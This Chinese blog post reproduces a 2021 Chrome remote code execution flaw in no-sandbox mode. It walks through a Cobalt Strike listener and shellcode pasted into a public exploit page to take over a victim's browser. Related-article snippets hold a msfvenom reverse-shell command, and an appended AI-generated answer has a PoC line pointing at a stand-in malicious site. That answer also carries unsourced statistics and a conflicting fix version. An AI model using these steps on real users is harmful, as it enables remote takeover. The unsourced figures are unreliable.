Chrome浏览器远程代码执行漏洞(无沙箱模式)

最新推荐文章于 2025-04-17 12:02:15 发布
原创 最新推荐文章于 2025-04-17 12:02:15 发布 · 1.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文分析了一项Chrome浏览器的0Day远程代码执行漏洞,介绍了漏洞利用的过程,并提供了修复方法。在特定条件下,攻击者可通过恶意网页进行远程代码执行。

漏洞介绍

漏洞描述

4月13日,国外安全研究员发布了Chrome 远程代码执行 0Day漏洞的PoC详情。攻击者可利用此漏洞,构造一个恶意的Web页面,用户访问该页面时,会造成远程代码执行。目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版( 89.0.4389.114)仍存在该漏洞。不过用户无需过分担心,由于Chrome浏览器会默认开启沙盒,可以拦截利用该漏洞发起的攻击,所以一般用户不会受到影响。

漏洞影响

Chrome在关闭沙箱(默认开启)的情况下,打开特定页面会造成远程代码执行

影响版本

Chrome 89.0.4389.114及以下版本
使用Chrome内核的其他浏览器,也会受到漏洞影响

漏洞利用

思路:若chrome开启–no-sandbox无沙箱模式,我们可以生成一个链接让受害者点击直接上线cobalt strike。
payload github地址:https://github.com/fengxuangit/ChromeRce
1.首先创建一个http的cs监听器
在这里插入图片描述
2.生成c的payload
在这里插入图片描述因为win10,选取x64
3.查看payload
在这里插入图片描述
在这里插入图片描述
4.将payload.c中的shellcode中的\替换成,0,替换后复制到从github上下载的payload.html中的shellcode里
在这里插入图片描述
在这里插入图片描述
保存为cs.html
5.我们可以尝试默认情况下(开启沙箱模式)是否能够利用
在这里插入图片描述
可以看到直接访问该文件,很明显无法利用
6.我们更改Google为无沙箱模式
在这里插入图片描述
无沙箱模式会提醒:
在这里插入图片描述
再次访问cs.html
在这里插入图片描述
发现cs成功上线,便可以执行命令了
在这里插入图片描述

Chrome 爆出最新漏洞,快更新你的 Chrome
neal1991的专栏
11-02 1454
原文:https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/ 译者:neal1991 点击蓝字“madMen”关注我哟 摘要 卡巴斯基安全防护是卡巴斯基产品的一部分,过去已成功检测到许多零日攻击。最近,为 Google的 Chrome 浏览器发现了一个...
漏洞复现——Chrome 浏览器的 0day 远程代码执行漏洞 (附poc)
gjgj的博客
04-21 7927
漏洞复现——Chrome 浏览器的 0day 远程代码执行漏洞 一、基本信息 CVE编号:CNVD-2021-27989 危险等级:严重 漏洞类型:远程代码执行漏洞 漏洞影响范围:Google Chrome < = 89.0.4389.114。 利用条件:Chrome: <=89.0.4389.114,开启--no-sandbox 无沙盒模式 二、漏洞描述 攻击者利用此漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。 Chr...
Chrome 远程代码执行漏洞CVE-2019-5786-EXP
weixin_30840253的博客
03-27 499
0x01 漏洞原理 CVE-2019-5786是位于FileReader中的UAF漏洞,由Google’s Threat Analysis Group的Clement Lecigne于2019-02-27报告,目前没有公布其它细节。 比较两个版本的源代码,发现third_party/blink/renderer/core/fileapi/file_reader_loader.cc有一些改...
【复现】Chrome三天内的第二枚0Day(结合其他漏洞可绕沙箱)
爱国小白帽
04-15 2091
漏洞描述 Google Chrome是由Google开发的免费网页浏览器。经测试,此漏洞影响 Chrome 最新正式版(89.0.4389.128)以及基于Chromium内核的Microsoft Edge正式版(89.0.774.76)。攻击者可通过构造特制web页面并诱导受害者访问来利用此漏洞获得远程代码执行。 影响范围 Google Chrome <= 89.0.4389.128 基于Chromium内核的Microsoft Edge <= 89.0.774.76 其他基于V8引擎的浏览.
google浏览器chrome 关闭沙箱 -no-sandbox
热门推荐
iteye_6988的博客
11-16 1万+
"C:\GoogleChromePortable\App\Google Chrome\chrome.exe" -no-sandbox
Chrome 远程代码执行漏洞复现
玄道的网安博客
04-14 590
漏洞概述 攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行漏洞无法完成chrome的沙箱逃逸,默认情况下chrome开启沙箱。如需无条件rce还需要沙箱逃逸的漏洞。 影响版本 Google:Chrome: <=89.0.4389.114 环境搭建 这里用Chrome 89.0.4389.90进行测试 开始之前,要将Chromesandbox关闭,直接在chrome的快捷方式--属性---位置/目标---移动到...
Google Chrome 0day 远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-18 860
1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12
Chrome浏览器远程代码执行0Day复现
痴人说梦梦中人
04-13 1491
一、漏洞简介          4月13日,国外安全研究员发布了Chrome 远程代码执行 0Day漏洞的PoC详情。攻击者可利用此漏洞,构造一个恶意的Web页面,用户访问该页面时,会造成远程代码执行。目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版( 89.0.4389.114)仍存在该漏洞。由于Chrome浏览器会默认开启沙盒,可以拦截利用该漏洞发起的
CVE-2021-21220 Chrome远程代码执行漏洞复现
m0_56642842的博客
06-30 2978
0x00 简介 Google Chrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。 通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。 微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以直接在电脑上接受手机微信上的任何信息,例如接收:文字、图片、语音、视频等功能。这款软件是腾讯公司为了方
Chrome漏洞可窃取数据并获得未经授权的访问权限
syg6921008的博客
04-17 1349
这些缺陷被识别为CVE-2025-3619和CVE-2025-3620,在Windows和Mac的135.0.7049.95/.96之前影响Chrome版本,影响Linux的135.0.7049.95/.96。该公司的内部安全工具,包括AddressSanitizer,MemorySantizer和libFuzzer,在发现和减轻这些威胁之前,在它们被广泛利用之前发挥了关键作用。一旦被利用,攻击者可能会窃取存储在浏览器中的密码、财务信息和其他敏感数据,甚至控制受影响的设备。关键 Chrome 漏洞
Google确认Chrome存在严重漏洞,向20亿用户发出警告:你们需立即更新浏览器
2401_84414990的博客
04-18 875
机会是留给有准备的人,大家在求职之前应该要明确自己的态度,熟悉求职流程,做好充分的准备,把一些可预见的事情做好。对于应届毕业生来说,校招更适合你们,因为绝大部分都不会有工作经验,企业也不会有工作经验的需求。同时,你也不需要伪造高大上的实战经验,以此让自己的简历能够脱颖而出,反倒会让面试官有所怀疑。你在大学时期应该明确自己的发展方向,如果你在大一就确定你以后想成为Java工程师,那就不要花太多的时间去学习其他的技术语言,高数之类的,不如好好想着如何夯实Java基础。请转发本文支持一下。
Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现
huangyongkang666的博客
11-18 5787
Google Chrome 任意文件读取漏洞(CVE-2023-4357)
Chrome 被曝 0day 漏洞,可让黑客获取用户数据
weixin_33748818的博客
03-01 340
谷歌浏览器 Chrome 中的 0day漏洞允许黑客使用浏览器加载恶意 PDF 文档来获取个人数据。由 EdgeSpot 发现的这项安全漏洞,已经在被黑客利用,谷歌官方修复方案只会在4...
注意了!Chrome 浏览器最新高危漏洞曝光
静觅
04-15 1679
这是「进击的Coder」的第 149篇热点新闻作者:okay来源:扩展迷EXTFANS“ 阅读本文大概需要 3 分钟。 ”4 月 14 日,国家信息安全漏洞共享平台(CNVD)收录了 G...
Chrome漏洞又出现
我的专栏
10-27 453
   一个开源的浏览器chrome由于它的漏洞百出,很多人放弃了,我也是一样,我用了一个星期后,又回来用FF,IE,看来这个CHROME来势很猛,但后来的劲真的是来足,放弃的人都明白,安全的重要性,这个我考虑过,最后用的还是IE,特别是在支付时,这并不说IE有多么的安全,起码一个成熟的浏览器比不个刚起步的还是好很多,虽然它的速度很快.   这次又曝地址欺骗的安全漏洞,使得很多人对它越来越来没有什么
Chrome漏洞分析与利用()——Issue-1062091漏洞分析
Anansi的博客
04-12 1484
漏洞环境 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。 这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,这个提交中的漏洞恰好移动到了实验版本命令行标志的后面。但是,这个更改位于Chrome 82.0.4065.0版本中,因此该漏洞Chrome稳定版本81的所有桌面平台上都是可以利用的。 环境配置 一开始打算像调试v8漏洞那样尝试用fetc
Chrome浏览器远程代码执行0Day漏洞风险通告——POC已公开
MachineGunJoe666
04-13 550
国外安全研究员发布了Chrome浏览器远程代码执行 0Day漏洞的POC详情,漏洞为“严重”级别,攻击者可以利用漏洞构造特别的页面,访问该页面会造成远程代码执行。 1漏洞描述 国外安全研究员发布了Chrome远程代码执行 0Day漏洞的POC详情,漏洞为“严重”级别。攻击者利用此漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。 Google Chrome是由Google开发的免费网页浏览器,大量采用Chrome内核的浏览器同样也会受此漏洞影响。 该0day漏...
注意了!Chrome浏览器最新高危漏洞曝光
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
04-18 473
????????关注后回复“进群”,拉你进程序员交流群????????来源丨扩展迷EXTFANS4月14日,国家信息安全漏洞共享平台(CNVD)收录了Google Chrome远程代码...
chrome浏览器rce
最新发布
09-14
<think> 嗯,用户这次想了解Chrome浏览器远程代码执行(RCE)漏洞相关信息,包括漏洞情况、利用方法和防范措施。首先需要整合之前提供的四个引用内容。 引用[1]提到国家信息安全漏洞共享平台收录了Chrome远程代码执行漏洞(CNVD-2021-27989),攻击者可未经授权远程执行代码,且漏洞细节已公开,厂商已发布修复版本。引用[2]说明攻击者可通过恶意页面诱导受害者访问实现远程代码执行,但单独利用无法逃逸沙盒,强调了沙盒作为安全边界的重要性。引用[3]指出漏洞源于V8引擎处理JS脚本时的逻辑问题导致堆溢出,影响基于Chromium的浏览器。引用[4]则提到漏洞复现需关闭沙箱模式,影响版本为Chrome ≤ 89.0.4389.114,并给出了POC链接。 用户明确要求了解漏洞情况、利用方法和防范措施。需要结构化整理: 漏洞情况包括漏洞编号、影响范围、根本原因(V8引擎缺陷)、触发方式(诱导访问恶意页面); 利用方法涉及诱导访问、沙箱逃逸限制(单独无法突破)、执行恶意代码的流程; 防范措施应覆盖更新浏览器、保持沙箱开启、谨慎访问链接、验证扩展程序来源、启用安全功能等。 考虑在回答中强调沙箱机制的关键作用,因为引用[2]和[4]都提到沙箱是核心防御层。防范措施需突出及时更新,引用[1]提到厂商已修复漏洞。此外,建议用户定期检查扩展程序来源,避免安装未经验证的插件。 </think> 以下是 Chrome 浏览器远程代码执行(RCE)漏洞的综合分析,整合漏洞原理、利用条件、防范措施及典型案例: --- ### **一、漏洞原理与成因** 1. **核心漏洞** 主要存在于 V8 JavaScript 引擎中,逻辑缺陷导致**内存堆溢出**(Heap Overflow)。攻击者通过精心构造的恶意 JavaScript 代码触发漏洞,篡改内存控制流实现任意代码执行[^3]。 2. **沙箱逃逸限制** 单独利用 RCE 漏洞**无法直接突破沙箱(Sandbox)**。沙箱作为 Chrome 的安全边界,将网页进程隔离在系统权限之外,阻止其对操作系统或其他页面进行破坏[^2]。因此,攻击者通常需结合其他漏洞(如内核提权)实现完整攻击链。 --- ### **二、漏洞利用关键条件** 1. **影响版本** Chrome ≤ 89.0.4389.114(2021 年披露的 CNVD-2021-27989 漏洞)[^1][^4]。 2. **利用前提** - 诱导用户访问恶意网页(含漏洞触发脚本)。 - 需配合 `--no-sandbox` 参数关闭沙箱模式才能直接控制系统(实验环境复现常见操作,但实际攻击中极少见用户主动关闭)[^4]。 3. **攻击链示例** ```mermaid graph LR A[恶意网页] --> B[触发V8堆溢出漏洞] B --> C[浏览器内RCE] C --> D{沙箱状态} D -- 开启 --> E[需结合内核漏洞提权] D -- 关闭 --no-sandbox --> F[直接控制系统] ``` --- ### **三、典型漏洞案例剖析** 1. **CNVD-2021-27989** - **危害**:远程执行任意代码,完全控制用户浏览器进程[^1]。 - **修复**:Google 在 90.0.4430.85 版本中修复,升级 V8 引擎内存管理逻辑。 2. **POC 复现关键步骤** ```bash # 环境要求 OS: Win7/Win10 + Chrome ≤ 89.0.4389.114 (64位) # 关闭沙箱执行(仅测试用) chrome.exe --no-sandbox http://malicious-site.com/exploit.html ``` > 注:实际攻击中极少用户主动关闭沙箱,因此攻击者通常需组合其他漏洞[^4]。 --- ### **四、全面防范措施** 1. **首要措施** - **立即更新浏览器**:确保 Chrome 版本 ≥ 最新稳定版(设置 → 关于 Chrome)。 - **严禁禁用沙箱**:绝对避免使用 `--no-sandbox` 参数[^4]。 2. **纵深防御** - 开启 **Site Isolation**(地址栏输入 `chrome://flags/#enable-site-per-process` → 设为 Enabled)。 - 安装 **广告拦截插件**(如 uBlock Origin),阻断恶意广告脚本。 - 禁用非必要 JavaScript(扩展程序如 NoScript)。 3. **企业级防护** ```markdown - 部署网络层过滤:WAF 规则屏蔽已知恶意脚本特征。 - 终端防护软件:启用内存保护功能(如 DEP/ASLR)。 - 定期扫描:使用漏洞扫描工具(如 Nessus)检测未修复客户端。 ``` --- ### **五、漏洞现状与趋势** - **频率**:Chrome 年均修补 20+ 个高危 RCE 漏洞(Google Project Zero 数据)。 - **趋势**: 1. 漏洞利用从 "单一链" 转向 "多漏洞组合攻击"(如 RCE+沙箱逃逸)。 2. 攻击目标从普通用户转向企业高价值目标(如供应链攻击)。 > 📌 **警示**:截至 2023 年,仍有 4% 的企业设备使用 EOL(生命周期终止)的 Chrome 版本,面临极高风险[^1]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值